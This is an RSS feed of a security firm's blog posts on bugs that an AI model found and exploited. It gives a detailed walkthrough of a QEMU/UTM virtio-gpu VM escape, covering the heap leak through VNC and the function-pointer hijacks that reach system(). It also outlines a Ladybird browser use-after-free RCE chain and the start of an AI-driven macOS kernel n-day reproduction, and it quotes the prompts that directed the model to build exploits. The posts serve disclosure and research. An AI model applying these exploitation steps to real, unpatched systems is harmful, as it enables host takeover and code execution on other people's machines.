<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[Calif]]></title><description><![CDATA[Calif]]></description><link>https://blog.calif.io</link><image><url>https://blog.calif.io/img/substack.png</url><title>Calif</title><link>https://blog.calif.io</link></image><generator>Substack</generator><lastBuildDate>Thu, 30 Apr 2026 21:41:57 GMT</lastBuildDate><atom:link href="https://blog.calif.io/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[Calif Global Inc.]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[calif@substack.com]]></webMaster><itunes:owner><itunes:email><![CDATA[calif@substack.com]]></itunes:email><itunes:name><![CDATA[Calif]]></itunes:name></itunes:owner><itunes:author><![CDATA[Calif]]></itunes:author><googleplay:owner><![CDATA[calif@substack.com]]></googleplay:owner><googleplay:email><![CDATA[calif@substack.com]]></googleplay:email><googleplay:author><![CDATA[Calif]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[MAD Bugs: QEMU and UTM Escape]]></title><description><![CDATA[In which the guest VNCs into its own host and watches the heap like a screensaver.]]></description><link>https://blog.calif.io/p/mad-bugs-qemu-and-utm-escape</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-qemu-and-utm-escape</guid><pubDate>Tue, 28 Apr 2026 14:42:59 GMT</pubDate><enclosure url="https://substackcdn.com/image/youtube/w_728,c_limit/WWfxGyWoXrc" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><em>This post is part of <a href="https://blog.calif.io/t/madbugs">MAD Bugs</a>, our Month of AI-Discovered Bugs, where we pair frontier models with human expertise and publish whatever falls out.</em></p><blockquote><p>Before we dive in, one piece of news. Dion Blazakis and Stefan Esser are joining Calif. Dion just <s>escaped</s> left the fruit company, so we thought it'd be fitting to drop a macOS VM escape exploit.</p></blockquote><p>Our targets are <strong><a href="https://www.qemu.org/">QEMU</a></strong> and <strong><a href="https://mac.getutm.app/">UTM</a></strong>. QEMU is the open-source machine emulator and virtualizer that powers most Linux virtualization stacks: libvirt, OpenStack, KubeVirt, and the KVM side of many cloud platforms. UTM is the App-Store-friendly macOS and iOS frontend that wraps QEMU. It ships to roughly 30K GitHub stars worth of Mac users who want to run Windows or Linux on Apple Silicon without dealing with VMware (which is technically free now but rumor has it requires a blood donation to the suckers at Broadcom before the download link appears).</p><p>We noticed UTM bundles its own QEMU (10.0.2), and that there is a version drift between what UTM ships and upstream. Our first prompts to Claude were:</p><div class="callout-block" data-callout="true"><p>find any vulnerabilities patched between the UTM version and latest which could be used as an escape on UTM?</p><p>audit qemu for a new guest-host escape which specifically would work on mac/osx/utm.</p></div><p>With a handful of further prompts, it found a guest-to-host code execution chain in QEMU's <code>virtio-gpu</code> device, and wrote ~1,500 lines of C that compile to a single static binary. Drop it into an unprivileged process inside a vulnerable VM and Calculator opens on the host.</p><div id="youtube2-WWfxGyWoXrc" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;WWfxGyWoXrc&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/WWfxGyWoXrc?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><blockquote><p><strong>Note on impact</strong>: There&#8217;s been some discussion about the impact of this exploit, so we want to clarify what we&#8217;re claiming. The VM security model assumes you have root in the guest and that the guest runs untrusted code. This exploit breaks that model in QEMU: we escape from the guest to the host and run arbitrary code there.</p><p>The chain does require QEMU&#8217;s VNC server to be enabled. VNC is the default in most headless deployments (Proxmox, libvirt, OpenStack), though UTM ships with it off. On UTM, the VM also has to have been configured in emulation mode, since UTM defaults to virtualization via Apple&#8217;s Virtualization framework, which bypasses QEMU entirely. The threat model isn&#8217;t &#8220;trick a user into downloading a preconfigured malicious UTM image.&#8221; It&#8217;s &#8220;an attacker who already has root on an isolated VM that&#8217;s running on UTM in emulation mode with VNC enabled.&#8221;</p><p>On macOS, apps also run inside Apple&#8217;s App Sandbox, so a full escape would need a second bug. We don&#8217;t think that layer is particularly strong, but we now need another bug to prove ourselves right.</p></blockquote><p>Modern memory-corruption exploitation needs two primitives: a <strong>write</strong> to corrupt state and a <strong>read</strong> to defeat ASLR and learn where to aim it. This bug hands over the write for free; the read is the novel part, and as far as we can tell a public first: a memory disclosure through QEMU&#8217;s own VNC server, reached over SLIRP loopback from the guest itself.</p><p>Concretely, the guest opens a TCP socket to its own host&#8217;s VNC port through QEMU&#8217;s emulated NIC at <code>10.0.2.2:5900</code>, sends a <code>FramebufferUpdateRequest</code>, and QEMU happily serializes a region of its own heap as pixel bytes back to the guest, which is now watching QEMU&#8217;s address space as if it were a screensaver. Claude assembled that read primitive autonomously from a single prompt:</p><div class="callout-block" data-callout="true"><p>figure it out the best way possible. do not modify qemu source. it needs to work from guest only. investigate turning the write to a read.</p></div><p>None of the published QEMU escapes we reviewed (<a href="https://osec.io/blog/2026-03-17-virtio-snd-qemu-hypervisor-escape/">OtterSec's virtio-snd</a>, <a href="https://phrack.org/issues/70/5">Talbi/Fariello's RTL8139</a>, the older <a href="https://blog.bi0s.in/2019/08/13/Pwn/VM-Escape/2019-07-29-qemu-vm-escape-cve-2019-14378/">SLIRP ICMP leak</a>) use the VNC server as an info-leak vehicle.</p><p>It turns out that the vulnerability was reported via ZDI (ZDI-CAN-27578) and fixed in QEMU 11.0.0 (April 21, 2026), but <strong>not backported to any 10.x stable</strong>. We didn't know that going in, and the rediscovery is a story in itself.</p><p><em>Even though this escape is now patched, it probably lasted longer than Cloudburst.</em></p><h2>The bug</h2><p><a href="https://github.com/qemu/qemu/blob/v10.0.2/hw/display/virtio-gpu.c#L230-L236"><code>hw/display/virtio-gpu.c</code></a> has a function, <code>calc_image_hostmem</code>, that computes how many bytes to allocate for a 2D pixel buffer:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">static uint32_t calc_image_hostmem(pixman_format_code_t pformat,
                                   uint32_t width, uint32_t height) {
    int bpp    = PIXMAN_FORMAT_BPP(pformat);
    int stride = ((width * bpp + 0x1f) &gt;&gt; 5) * sizeof(uint32_t);
    return height * stride;
}</code></pre></div><p>A quick aside on <a href="https://www.pixman.org/">pixman</a>, which will keep showing up: it is the low-level 2D pixel-manipulation library that backs Cairo and the X server, and that QEMU uses to represent every display surface in the system. A <code>pixman_image_t</code> is essentially a <code>(format, width, height, stride, raw pointer)</code> tuple plus the compositing/scaling routines that operate on it. When QEMU's <code>virtio-gpu</code> allocates a 2D resource for the guest, it is allocating a buffer and wrapping it in a <code>pixman_image_t</code>.</p><p>Every intermediate in <code>calc_image_hostmem</code> is a 32-bit <code>int</code>. For <code>bpp = 32</code> and a guest-supplied <code>width = 0x40000001</code>, the <code>width * bpp</code> multiplication wraps, the round-up-to-32-bits trick rounds the wrong number, and <code>stride</code> collapses to <strong>4</strong>. With <code>height = 128</code>, <code>calc_image_hostmem</code> returns 512. QEMU then allocates 512 bytes, hands them to pixman as <code>pixman_image_create_bits(BGRA, 0x40000001, 128, ptr, stride=4)</code>, and stores the <em>original</em>, un-overflowed <code>0x40000001</code> in <code>res-&gt;width</code>.</p><p>Every later bounds check on this resource (in <code>set_scanout</code>, in <code>transfer_to_host_2d</code>) checks against <code>res-&gt;width</code>. Which is a lie. The guest can address pixel coordinates up to ~4 GB past the actual 512-byte buffer.</p><p>That is the entire bug, but the <em>why</em> of it is interesting. Pixman's <code>pixman_image_create_bits(format, width, height, bits, rowstride)</code> has two modes. Pass <code>bits = NULL</code> and pixman allocates the buffer itself, performs its own overflow check, and ignores your <code>rowstride</code>. Pass <code>bits = &lt;pre-allocated pointer&gt;</code> and pixman trusts you completely: it uses your pointer, uses your stride, and runs no checks, because by API contract the caller has already validated.</p><p>Before <a href="https://github.com/qemu/qemu/commit/9462ff4695aa">a 2023 commit</a>, virtio-gpu used the first mode. <code>calc_image_hostmem</code> existed, but only to compute <code>res-&gt;hostmem</code>, the per-VM accounting number used to enforce memory budgets. Pixman did the actual allocation, and pixman caught overflow. The buggy <code>int stride</code> was lying about a counter, not a buffer size.</p><p>The 2023 commit switched to the second mode. Windows display surfaces need a shareable <code>HANDLE</code>, which means the buffer has to be allocated by QEMU with <code>qemu_win32_map_alloc()</code>, not by pixman. So virtio-gpu started allocating <code>calc_image_hostmem(...)</code> bytes itself and passing the pointer and stride into pixman. The commit message even flags the behavior change:</p><blockquote><p><em>when bits are provided to pixman_image_create_bits(), you must also give the rowstride (the argument is ignored when bits is NULL).</em></p></blockquote><p>Pixman dropped its overflow check because the API contract said it could, the same buggy function went from accounting counter to trusted allocation size, and nobody re-audited it. The caller did not validate.</p><h2>The chain</h2><p>The bug gives an OOB <em>write</em> directly: <code>transfer_to_host_2d</code> will happily copy guest-controlled bytes to <code>pixbuf + x * bpp</code> for any <code>x &lt; 0x40000001</code>. What it does not give you, on its own, is an OOB <em>read</em>, which means no ASLR bypass, which means the write is mostly useful for the host process.</p><p>The way Claude solved the read-primitive problem is, we think, the prettiest part of this exploit, and we want to walk through it because it took us a minute to believe.</p><p><code>set_scanout</code> is the virtio-gpu command that says "this <code>pixman_image_t</code> is the active display surface; show this on the screen." The bounds check on its arguments uses the same broken <code>res-&gt;width</code>, so the guest can configure the active display surface to point at memory 1 GB past the 512-byte buffer.</p><p>QEMU has a built-in VNC server. Its job, by definition, is to encode the active display surface as pixel data and ship those bytes to any TCP client that connects to port 5900.</p><p>QEMU's default user-mode networking stack, SLIRP, makes the host reachable from the guest at <code>10.0.2.2</code>. So the guest opens a TCP socket to <code>10.0.2.2:5900</code> (its own host's VNC port, reached through QEMU's own emulated NIC), sends a <code>FramebufferUpdateRequest</code>, and QEMU's VNC server politely serialises a region of its own heap as pixel bytes back over the socket.</p><p>A <code>FramebufferUpdateRequest</code> returns <code>width &#215; height &#215; 4</code> bytes, so reads are 16 KB pages at scan time and 256 bytes for targeted lookups. Encoding host memory as pixels has the lovely side effect that there is no protocol-level interpretation, no parser, no escaping; every byte of the address range comes back unmangled, just slightly fewer per second than you'd like.</p><p>From the read primitive it's a fairly textbook macOS arm64 chain. Scan forward 16 KB at a time looking for Mach-O headers; identify pixman by <code>sizeofcmds</code>; read <code>GOT[free]</code> to derive the shared cache slide; compute <code>system()</code>. Plant a fake <code>pixman_implementation_t</code> whose <code>fast_paths</code> array has a wildcard entry whose <code>func</code> is <code>system()</code>. The implementation pointer is the first argument to <code>func</code> on arm64, so we put the command string at offset 0 of the same struct and let it serve double duty. Two more OOB writes neutralise pixman's TLS fast-path cache and overwrite <code>_global_implementation</code>. A final <code>RESOURCE_FLUSH</code> triggers a VNC composite, pixman walks our fake chain, the wildcard matches, <code>system()</code> runs.</p><p>The command string has to fit in 15 bytes (the <code>fast_paths</code> pointer lives at offset <code>0x10</code>), so <code>open -a Calculator</code> is too long. <code>open /*/*/Calc*</code> is exactly 15, and <code>/bin/sh</code> expands the glob to <code>/System/Applications/Calculator.app</code>. (Our first attempt, <code>/S*/A*/Ca*</code>, also matched <code>Calendar.app</code>, which made for a less convincing demo.)</p><p>UTM adds one more twist. Its QEMU allocates virtio-gpu pixel buffers through <code>qemu_pixman_image_new_shareable</code>, which is <code>memfd</code> + <code>mmap</code> rather than <code>malloc</code>, so the exploit buffer lands in an address-space hole between UTM's twenty-odd bundled frameworks instead of out in the large-object heap. dyld shuffles those frameworks on every launch, and on a meaningful fraction of boots pixman (2.4 MB, one of the smallest) ends up at a <em>lower</em> address than the first hole big enough for our buffer. The OOB write only reaches forward, so pixman's <code>_global_implementation</code> is then physically behind us and the hijack above cannot land.</p><p>The fallback is to target QEMU itself. Its image is a 29 MB block, large enough that the buffer essentially never lands above it, so the scan carries a second fingerprint table for QEMU's <code>__TEXT</code> and derives <code>system()</code> from QEMU's GOT instead. The control-flow hijack moves to QEMU's <code>__la_symbol_ptr[g_free]</code> (writable, ~70 MB forward, comfortably in range): one OOB write points it at <code>system()</code>, and the trigger is a deliberately short <code>RESOURCE_ATTACH_BACKING</code> whose entry bytes spell the shell command. <code>virtio_gpu_create_mapping_iov</code> <code>g_malloc</code>s a scratch buffer, copies our bytes in verbatim, fails the length check, and on the error path calls <code>g_free(ents)</code>, which is now <code>system("open -a Calculator")</code>. A nice side effect is that this path has no 15-byte limit; the command can be as long as a virtqueue descriptor.</p><p>The chain needs the guest to reach a VNC server. That is the default almost everywhere headless QEMU runs: Proxmox, libvirt's stock <code>&lt;graphics type='vnc'/&gt;</code>, OpenStack, every CI runner that boots VMs with <code>-vnc :0</code>. On UTM it is non-default, and requires a one line config <code>-vnc :0</code>. The bug itself is present in every UTM install regardless.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MsJi!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MsJi!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 424w, https://substackcdn.com/image/fetch/$s_!MsJi!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 848w, https://substackcdn.com/image/fetch/$s_!MsJi!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 1272w, https://substackcdn.com/image/fetch/$s_!MsJi!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MsJi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png" width="1456" height="1213" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1213,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:308461,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/195718529?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!MsJi!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 424w, https://substackcdn.com/image/fetch/$s_!MsJi!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 848w, https://substackcdn.com/image/fetch/$s_!MsJi!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 1272w, https://substackcdn.com/image/fetch/$s_!MsJi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Reproduce</h2><p>The PoCs and AI-generated write-up can be found <a href="https://github.com/califio/publications/blob/main/MADBugs/qemu">here</a>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">./run_poc_macos.sh        # ~5 min: install deps, build QEMU 10.0.2, build exploit
./run_poc_macos.sh run    # ~30 sec from boot to calc</code></pre></div><h2>Conclusion</h2><p>One thing we do not know is how Claude arrived at the bug. Our first prompt asked it to diff UTM's QEMU against upstream, and the fix commit was already public; it is possible the model spotted <a href="https://github.           +com/qemu/qemu/commit/c035d5eadf400670593a76778f98f052d7482968">c035d5ea</a> and worked backward, and equally possible it audited <code>virtio-gpu.c</code> cold and rediscovered the overflow on its own. We cannot tell from the transcript, and either answer is kinda cool: one means a frontier model can mine patch diffs into working escapes faster than downstreams can ship the patch, the other means it can find the same bug ZDI paid for without being pointed at it.</p><p>While the bug is a simple integer overflow, the exploit is, as far as we know, the first documented case of AI doing creative <em>exploit primitive design</em>: wiring three unrelated QEMU subsystems (virtio-gpu, the VNC server, SLIRP loopback) into a leak nobody had published before.</p><p>From there it ported the chain to Linux aarch64, rebuilt it as a SPICE-safe UTM variant after we reported the original crashed under UTM's display-refresh thread, pivoted from "overwrite <code>GOT[free]</code>" to writable BSS when macOS chained-fixups turned out to make the GOT read-only, and added the QEMU-<code>g_free</code> fallback when ASLR put pixman behind the buffer. None of those pivots involved a human pointing at the answer; the <a href="https://github.com/califio/publications/blob/main/MADBugs/qemu/WRITEUP.md#conversation-prompts">full prompt log</a> is a dozen one-liners.</p><p>However, Claude hasn't (re)discovered fancy tricks such as KMART or MHST[^1] for this exploit, so the super humans among us still have some edge over it. At least for now.</p><p>[^1]: Kortchinsky-Midturi ARM ROP Technique and Midturi Heap Spray Technique. These are legendary exploitation techniques invented by the MSRC and SWI Pentest team fifteen or so years ago. CC <a href="https://x.com/crypt0ad">@crypt0ad</a></p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: RCE in Ladybird]]></title><description><![CDATA[When Bruce told me he wanted to hack Ladybird, my first thought was: why does the monk want to find bugs in a bug?]]></description><link>https://blog.calif.io/p/mad-bugs-rce-in-ladybird</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-rce-in-ladybird</guid><pubDate>Fri, 24 Apr 2026 10:07:02 GMT</pubDate><enclosure url="https://substackcdn.com/image/youtube/w_728,c_limit/NQxvMRqS_9o" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><em>This post is part of <a href="https://blog.calif.io/t/madbugs">MAD Bugs</a>, our Month of AI-Discovered Bugs, where we pair frontier models with human expertise and publish whatever falls out.</em></p><p><a href="https://ladybird.org/">Ladybird</a>, it turns out, is a new browser, written entirely from scratch with a stated rule of <em>no code from other browsers</em>. Its JavaScript engine, LibJS, is its own design too. The project <a href="https://ladybird.org/posts/adopting-rust/">adopted Rust in February</a> and picked LibJS as the first thing to port, but the migration is incremental and most of the engine, the DOM, and the WebAssembly bindings are still C++ today.</p><p>That combination made it an interesting question for this series. Everything we've pointed AI at so far has had a public exploitation history it could lean on: JavaScriptCore, the FreeBSD kernel, decades of Phrack. Ladybird has none. As far as we know nobody has published an exploit against it, and it shares no code with the engines that have a decade of writeups. So: can AI pop a browser engine it has never seen anyone hack?</p><p>Bruce pointed Claude at the source tree and had it popping calc within a few hours. The bug is a use-after-free in the still-C++ WebAssembly binding: a typed array's cached data pointer goes stale after a shared <code>WebAssembly.Memory</code> is grown twice.</p><div id="youtube2-NQxvMRqS_9o" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;NQxvMRqS_9o&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/NQxvMRqS_9o?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><p><strong>Update, April 24:</strong> We were not the first after all. <a href="https://x.com/e65537">tsune</a> found this same bug a few days before we did, <a href="https://github.com/LadybirdBrowser/ladybird/security/advisories/GHSA-w89h-j2xg-c457">reported</a> it, got a fix landed in <code>d8aee7f1e6</code>, and published <a href="https://blog.reg.rip/exploiting-the-ladybird-browser.html">a full exploit writeup</a> while we were still poking at the source tree. That patch turned out to be incomplete (it refreshes the stale pointer on the first <code>grow()</code> but loses track of the old buffer's views on the second), which is the variant Claude landed on. tsune's <a href="https://x.com/e65537/status/2047626391001419866">response</a> to this post was more gracious than we deserve:</p><div class="twitter-embed" data-attrs="{&quot;url&quot;:&quot;https://x.com/e65537/status/2047626391001419866&quot;,&quot;full_text&quot;:&quot;damm, my patch was incomplete.\nThey exploited much more smartly than I did.\n<a class=\&quot;tweet-url\&quot; href=\&quot;https://blog.reg.rip/exploiting-the-ladybird-browser.html\&quot;>blog.reg.rip/exploiting-the&#8230;</a>&quot;,&quot;username&quot;:&quot;e65537&quot;,&quot;name&quot;:&quot;tsune&quot;,&quot;profile_image_url&quot;:&quot;https://pbs.substack.com/profile_images/2039350827496964096/wKy-721h_normal.jpg&quot;,&quot;date&quot;:&quot;2026-04-24T10:39:09.000Z&quot;,&quot;photos&quot;:[],&quot;quoted_tweet&quot;:{&quot;full_text&quot;:&quot;MAD Bugs: RCE in Ladybird\n\nBlog: https://t.co/I6v4maqsEJ\n\nPoC: https://t.co/g9jmtCZax0\n\nhttps://t.co/8fB8xLXw8j&quot;,&quot;username&quot;:&quot;calif_io&quot;,&quot;name&quot;:&quot;Calif&quot;,&quot;profile_image_url&quot;:&quot;https://pbs.substack.com/profile_images/1632109373312098304/g0Lwk48t_normal.jpg&quot;},&quot;reply_count&quot;:0,&quot;retweet_count&quot;:4,&quot;like_count&quot;:15,&quot;impression_count&quot;:979,&quot;expanded_url&quot;:null,&quot;video_url&quot;:null,&quot;belowTheFold&quot;:false}" data-component-name="Twitter2ToDOM"></div><h2>What it says about AI</h2><p>The first reason this worked, on an engine Claude had never seen anyone hack, is that AI needs prior art on the <em>problem class</em>, not on the target. Browser-engine exploitation is engine-shaped rather than codebase-shaped: a model that has internalized the JSC and V8 literature already knows how to attack any spec-compliant engine.</p><p>Every performant JavaScript runtime, implementing the same standard under the same performance pressure, ends up with the same shapes: NaN-boxed values, a cached raw data pointer in every typed array, an assembly fast path that trusts a handful of fields at fixed offsets. Ladybird arrived at all of those independently, and the standard <code>addrof</code>/<code>fakeobj</code> ladder transferred to it on first contact.</p><h2>What it says about security</h2><p>The other half of why this took hours rather than months is mitigations. After <code>addrof</code>/<code>fakeobj</code>, Claude's chain reaches <code>system()</code> by corrupting a typed array into arbitrary read/write and overwriting one function pointer. Point that same chain at Safari and three independent layers each stop it cold: Gigacage fences the typed-array read/write away from anything useful, arm64e PAC kills the process at the first unsigned indirect branch, and the WebContent sandbox blocks <code>exec</code> even past all of that. Chrome's V8 sandbox, trusted pointers, and renderer sandbox do the equivalent. Ladybird today is where those engines stood years ago.</p><p>We spend a lot of this series showing that AI can find and exploit a lot of cool bugs, and that's true. But the gap between "RCE in a few hours" on Ladybird and "months of work by a specialist team for a still-sandboxed renderer compromise" on Chrome is eighteen years of security engineering, layer on deliberate layer, each one added because the previous generation of exactly this exploit made it necessary. Watching the textbook chain walk straight through is a reminder that those layers work. Using AI to quickly defeat them is, we think, the current frontier of vulnerability research.</p><h2>Learn on this one</h2><p>As usual for this series, Claude found the bug and wrote the exploit on its own; the technical advisory is in the <a href="https://github.com/califio/publications/tree/main/MADBugs/ladybird">README</a>.</p><p>We then had it turn the whole thing into a <a href="https://github.com/califio/publications/blob/main/MADBugs/ladybird/WRITEUP.html">long-form teaching writeup</a>, and the way that document came together is worth a note of its own. Its first draft was correct but skipped exactly the things a newcomer wouldn't know, because Claude doesn't know what <em>you</em> don't know.</p><p>The current version is the result of us reading it, getting stuck, and asking "wait, what's the relationship between X and bufA?" or "why 16384?" or "what even is a Proxy trap?" until every gap was filled. That back-and-forth turned out to be the learning mechanism: the model is a better teacher than the literature precisely because the literature can't be interrogated, and being forced to articulate what you don't understand is most of the work of understanding it.</p><p>If you've never done browser exploitation, that writeup is worth your time. Production-engine writeups are mostly mitigation bypasses, which only make sense once you already know what the unobstructed attack looks like. This is the unobstructed attack: every primitive does exactly what its name says, in an engine simple enough to hold in your head. Read it first, and the <a href="https://github.com/califio/publications/blob/main/MADBugs/coruna/Stage1-writeup.md">Coruna JavaScriptCore chain</a> becomes the natural second chapter.</p><blockquote><p>We'd like to acknowledge the Ladybird maintainers, who were lovely about this and asked us to just file it <a href="https://github.com/LadybirdBrowser/ladybird/issues/9062">in the open</a>. Their security policy says pre-release bugs can be disclosed publicly, and they mean it, so everything linked above is a live 0-day with their blessing.</p></blockquote>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: An Apple Kernel Bug, Brought to You by Microsoft]]></title><description><![CDATA[Autonomous N-day analysis of CVE-2026-28825.]]></description><link>https://blog.calif.io/p/mad-bugs-an-apple-kernel-bug-brought</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-an-apple-kernel-bug-brought</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Wed, 22 Apr 2026 20:26:10 GMT</pubDate><content:encoded><![CDATA[<p><em>This post is part of <a href="https://blog.calif.io/t/madbugs">MAD Bugs</a>, our Month of AI-Discovered Bugs, where we pair frontier models with human expertise and publish whatever falls out.</em></p><p>At Calif we spend an unhealthy amount of time <a href="https://blog.calif.io/p/reverse-engineering-apples-silent">picking apart Apple security updates and beta releases</a>. Today we want to highlight <strong>CVE-2026-28825</strong>, a kernel heap out-of-bounds write in <code>smbfs.kext</code> that Apple patched in macOS 26.4, and share how we used Claude to analyze and reproduce it.</p><p>Throughout this analysis you will notice that the data comes from <code>ipsw</code>, IDA, MS-SMB2, and XNU, which is nothing unusual; people have been bindiffing Apple updates since roughly the invention of the apple. The interesting part is that the agent did this autonomously using our in-house harness, driving the same tools a human researcher would, with no human intervention between "here's a URL" and "here's a kernel panic."</p><p>What follows is a human-annotated version of what the AI did. Our commentary is in <em>italics</em>, mostly so you can tell which parts are us being smug and which parts are the robot being smart.</p><h2>The setup</h2><p>So far in this MAD Bugs series we've mostly asked models to find new bugs. This time we wanted to flip it around: given nothing but a vendor advisory, can an agent reconstruct the bug and produce a working trigger? Can AI do the N-day grind so we don't have to?</p><p>We gave Claude a host running macOS 26.4, a 26.3.2 VM to bully, our Calif harness (which is first-rate duct tape around <code>ipsw</code>, <code>tart</code>, and headless IDA), and one prompt:</p><blockquote><p>we are going to try and triage and write n-day PoC exploits for the latest macOS 26.4 (which is the same as the host you are running on) here is the apple security notes - https://support.apple.com/en-us/126794 create a plan/TODO list with an item for EACH of these so we can research them one-by-one and create a list of the MOST interesting/highest impact ones to look into and then we will do deep dives on each and create exploit PoCs for each do you understand? ask any clarifying questions now</p></blockquote><p>That's it. We then went to the gym and absolutely did not spend the entire time refreshing the Claude session log on our phones.</p><h2>The vulnerability</h2><p>The macOS 26.4 